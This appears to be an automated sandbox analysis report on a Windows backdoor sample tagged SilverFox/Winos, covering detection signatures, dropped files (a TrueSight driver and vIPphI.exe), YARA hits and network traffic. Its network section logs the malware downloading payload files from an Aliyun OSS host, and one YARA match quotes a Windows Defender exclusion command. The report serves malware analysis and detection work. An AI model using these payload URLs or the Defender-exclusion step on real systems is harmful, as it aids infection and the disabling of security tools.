Edit tour

Windows Analysis Report
KHoDN.76532.10.exe

Overview

General Information

Sample name:	KHoDN.76532.10.exe
Analysis ID:	1645983
MD5:	96599c5a60e5589f37ec8e25f05f43c3
SHA1:	b3ed652bef2a2318c753332808cf989fd79ddca0
SHA256:	baf8f986caa4ad8b3e8a58fea88015ff1d677e4feff6bea71538fdd76b151f3c
Tags:	backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:	96
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Drops PE files to the document folder of the user

Found direct / indirect Syscall (likely to bypass EDR)

Joe Sandbox ML detected suspicious sample

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Sample is not signed and drops a device driver

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates driver files

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Yara signature match

Classification

Process Tree

System is w10x64

KHoDN.76532.10.exe (PID: 8564 cmdline: "C:\Users\user\Desktop\KHoDN.76532.10.exe" MD5: 96599C5A60E5589F37EC8E25F05F43C3)

vIPphI.exe (PID: 3504 cmdline: C:\Users\user\Documents\vIPphI.exe MD5: DF76205EAF175184567FC44A83019B20)

cleanup

Yara Signatures

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.vIPphI.exe.20a56520000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x213df:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x21492:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x214f0:$e2: Add-MpPreference -ExclusionPath

Joe Sandbox Signatures

• AV Detection
• Compliance
• Spreading
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Lowering of HIPS / PFW / Operating System Security Settings

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: KHoDN.76532.10.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: KHoDN.76532.10.exe

Virustotal: Detection: 18%

Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown

HTTPS traffic detected: 39.103.20.80:443 -> 192.168.2.5:49732 version: TLS 1.2

Source:	Binary string: C:\new-builder\SAC-10.9-dev\master\SAC\Solutions\x64\Release\ManageReaders.pdb source: vIPphI.exe, 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmp, vIPphI.exe, 00000007.00000000.2402096720.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmp, vIPphI.exe.0.dr
Source:	Binary string: C:\Users\qt\work\qt\qtvirtualkeyboard\plugins\virtualkeyboard\qtvirtualkeyboard_openwnn.pdb<< source: KHoDN.76532.10.exe
Source:	Binary string: D:\dev\navicatlibs\windows\x64\Release\libqb.pdb source: KHoDN.76532.10.exe
Source:	Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: KHoDN.76532.10.exe
Source:	Binary string: C:\Users\qt\work\qt\qtquickcontrols2\lib\Qt5QuickTemplates2.pdb source: KHoDN.76532.10.exe
Source:	Binary string: D:\dev\navicatlibs\windows\x64\Release\libqb.pdbII(!GCTL source: KHoDN.76532.10.exe
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\platforms\qwindows.pdb source: KHoDN.76532.10.exe
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: aceprocted.sys.0.dr
Source:	Binary string: C:\Users\qt\work\qt\qtvirtualkeyboard\plugins\virtualkeyboard\qtvirtualkeyboard_openwnn.pdb source: KHoDN.76532.10.exe

Source: C:\Users\user\Documents\vIPphI.exe

Code function: 7_2_00007FF79EE69AE0 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,

7_2_00007FF79EE69AE0

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: 3MHost: f3rf3r.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: 3MHost: f3rf3r.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: 3MHost: f3rf3r.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: 3MHost: f3rf3r.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: 3MHost: f3rf3r.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: 3MHost: f3rf3r.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: 3MHost: f3rf3r.oss-cn-beijing.aliyuncs.comCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: f3rf3r.oss-cn-beijing.aliyuncs.com

Source: KHoDN.76532.10.exe	String found in binary or memory: http://aia.entrust.net/evcs1-chain256.cer01
Source: KHoDN.76532.10.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: KHoDN.76532.10.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: aceprocted.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: aceprocted.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: KHoDN.76532.10.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: KHoDN.76532.10.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vIPphI.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: vIPphI.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: KHoDN.76532.10.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: KHoDN.76532.10.exe	String found in binary or memory: http://crl.entrust.net/evcs1.crl0
Source: KHoDN.76532.10.exe	String found in binary or memory: http://crl.entrust.net/g2ca.crl0;
Source: KHoDN.76532.10.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: vIPphI.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: aceprocted.sys.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: KHoDN.76532.10.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: KHoDN.76532.10.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: aceprocted.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: vIPphI.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: vIPphI.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: aceprocted.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: KHoDN.76532.10.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: KHoDN.76532.10.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: KHoDN.76532.10.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: aceprocted.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: vIPphI.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: aceprocted.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: KHoDN.76532.10.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: KHoDN.76532.10.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vIPphI.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: KHoDN.76532.10.exe	String found in binary or memory: http://macromedia.com/resources/richmedia/tracking/designers_guide)
Source: vIPphI.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: vIPphI.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: KHoDN.76532.10.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: aceprocted.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: KHoDN.76532.10.exe	String found in binary or memory: http://ocsp.digicert.com0N
Source: KHoDN.76532.10.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: aceprocted.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: KHoDN.76532.10.exe	String found in binary or memory: http://ocsp.entrust.net00
Source: KHoDN.76532.10.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: KHoDN.76532.10.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: KHoDN.76532.10.exe	String found in binary or memory: http://ocsp.entrust.net05
Source: vIPphI.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: aceprocted.sys.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: KHoDN.76532.10.exe	String found in binary or memory: http://prismstandard.org/namespaces/prismusagerights/2.1/
Source: aceprocted.sys.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: aceprocted.sys.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: aceprocted.sys.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.campio-group.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.candlewoodsuites.com/montrea)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.capebretonresorts.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.centuryamadeus.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.cesdistribution.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.chocolatelakehotel.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.cocacola.ca/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.corporate.nestle.ca/en)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.crowneplaza.com/fredericton/corwneplaza)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.crowneplaza.com/moncton/crowneplaza)
Source: vIPphI.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: aceprocted.sys.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.dine-art.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.eastlink.ca/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.embassysuites3.hilton.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.emhlaw.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.entrust.net/rpa0
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.gfscanada.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.gktw.org/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.guestsupply.ca/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.hamptoninntruro.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.hiexpress.com/DeerLake/HIExpress)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.holidayinn.com/truro)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.hotelfaubourgmontreal.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.iab.net/guidelines/508676/508767/displayguidelines)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.ihg.com/canada)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.irvingenergy.ca/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.jeffalpaugh.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.kingswoodpark.ca/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.kingswoodpark.ca/golf)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.macinteriordesign.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.meublesjlm.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.mohawkgroup.com/durkan)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.mohawkgroup.com/segments/hospitality)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.mountainviewsuites.ca/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.radisson.com/fredericton-nb)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.radissonhotelgroup.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.renwil.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.rogers.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.samsung.com/business)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.samsung.com/ca)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.simmonscanada.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.super8amherst.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.textilespatlin.com/)
Source: KHoDN.76532.10.exe	String found in binary or memory: http://www.vatransport.com/)
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/4
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/F
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gif
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gif#5
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gif8
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gifW5
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gifhttps://f3rf3r.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/b
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/b.gif
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/c.gif
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/d
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/d.gif
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/i.dat
Source: KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f3rf3r.oss-cn-beijing.aliyuncs.com/v
Source: vIPphI.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: KHoDN.76532.10.exe, aceprocted.sys.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: KHoDN.76532.10.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: KHoDN.76532.10.exe	String found in binary or memory: https://youtu.be/sDsXDjXYycQ)

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown

HTTPS traffic detected: 39.103.20.80:443 -> 192.168.2.5:49732 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.vIPphI.exe.20a56520000.1.unpack, type: UNPACKEDPE

Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen

PE file contains section with special chars

Source: eToken.dll.0.dr	Static PE information: section name: .QO
Source: eToken.dll.0.dr	Static PE information: section name: .{,3

Source: C:\Users\user\Documents\vIPphI.exe

Code function: 7_2_00007FF79EE63CA9 NtAllocateVirtualMemory,

7_2_00007FF79EE63CA9

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe

File created: C:\Windows\Temp\aceprocted.sys

Jump to behavior

Source: C:\Users\user\Documents\vIPphI.exe	Code function: 7_2_00007FF79EE6190C	7_2_00007FF79EE6190C
Source: C:\Users\user\Documents\vIPphI.exe	Code function: 7_2_00007FF79EE6F908	7_2_00007FF79EE6F908
Source: C:\Users\user\Documents\vIPphI.exe	Code function: 7_2_00007FF79EE68178	7_2_00007FF79EE68178
Source: C:\Users\user\Documents\vIPphI.exe	Code function: 7_2_00007FF79EE69AE0	7_2_00007FF79EE69AE0

Source: Joe Sandbox View

Dropped File: C:\Users\user\Documents\vIPphI.exe A6123E13E12A1A1D4C4A4EB034769BFE8E229C3A9877E0DD173B422E700A26AC

Source: KHoDN.76532.10.exe	Binary or memory string: OriginalFilenamelibqb.dll@ vs KHoDN.76532.10.exe
Source: KHoDN.76532.10.exe	Binary or memory string: OriginalFilenameQt5QuickTemplates2.dll( vs KHoDN.76532.10.exe
Source: KHoDN.76532.10.exe	Binary or memory string: OriginalFilenameqwindows.dll( vs KHoDN.76532.10.exe
Source: KHoDN.76532.10.exe	Binary or memory string: OriginalFilenameqtvirtualkeyboard_openwnn.dllp( vs KHoDN.76532.10.exe

Source: 7.2.vIPphI.exe.20a56520000.1.unpack, type: UNPACKEDPE

Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender

Source: aceprocted.sys.0.dr	Binary string: \Device\Driver\
Source: aceprocted.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal96.evad.winEXE@2/13@1/1

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\i[1].dat

Jump to behavior

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe

Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe

File created: C:\Windows\Temp\aceprocted.sys

Jump to behavior

Source: KHoDN.76532.10.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: KHoDN.76532.10.exe

Virustotal: Detection: 18%

Source: KHoDN.76532.10.exe	String found in binary or memory: /S /Launch
Source: KHoDN.76532.10.exe	String found in binary or memory: <!--StartFragment-->
Source: KHoDN.76532.10.exe	String found in binary or memory: <!--StartFragment--><!--EndFragment-->x

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe

File read: C:\Users\user\Desktop\KHoDN.76532.10.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\KHoDN.76532.10.exe "C:\Users\user\Desktop\KHoDN.76532.10.exe"
Source: unknown	Process created: C:\Users\user\Documents\vIPphI.exe C:\Users\user\Documents\vIPphI.exe

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: pid.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	Section loaded: etoken.dll	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: KHoDN.76532.10.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: KHoDN.76532.10.exe

Static file information: File size 54836251 > 1048576

Source: KHoDN.76532.10.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KHoDN.76532.10.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KHoDN.76532.10.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KHoDN.76532.10.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KHoDN.76532.10.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KHoDN.76532.10.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: KHoDN.76532.10.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\new-builder\SAC-10.9-dev\master\SAC\Solutions\x64\Release\ManageReaders.pdb source: vIPphI.exe, 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmp, vIPphI.exe, 00000007.00000000.2402096720.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmp, vIPphI.exe.0.dr
Source:	Binary string: C:\Users\qt\work\qt\qtvirtualkeyboard\plugins\virtualkeyboard\qtvirtualkeyboard_openwnn.pdb<< source: KHoDN.76532.10.exe
Source:	Binary string: D:\dev\navicatlibs\windows\x64\Release\libqb.pdb source: KHoDN.76532.10.exe
Source:	Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: KHoDN.76532.10.exe
Source:	Binary string: C:\Users\qt\work\qt\qtquickcontrols2\lib\Qt5QuickTemplates2.pdb source: KHoDN.76532.10.exe
Source:	Binary string: D:\dev\navicatlibs\windows\x64\Release\libqb.pdbII(!GCTL source: KHoDN.76532.10.exe
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\platforms\qwindows.pdb source: KHoDN.76532.10.exe
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: aceprocted.sys.0.dr
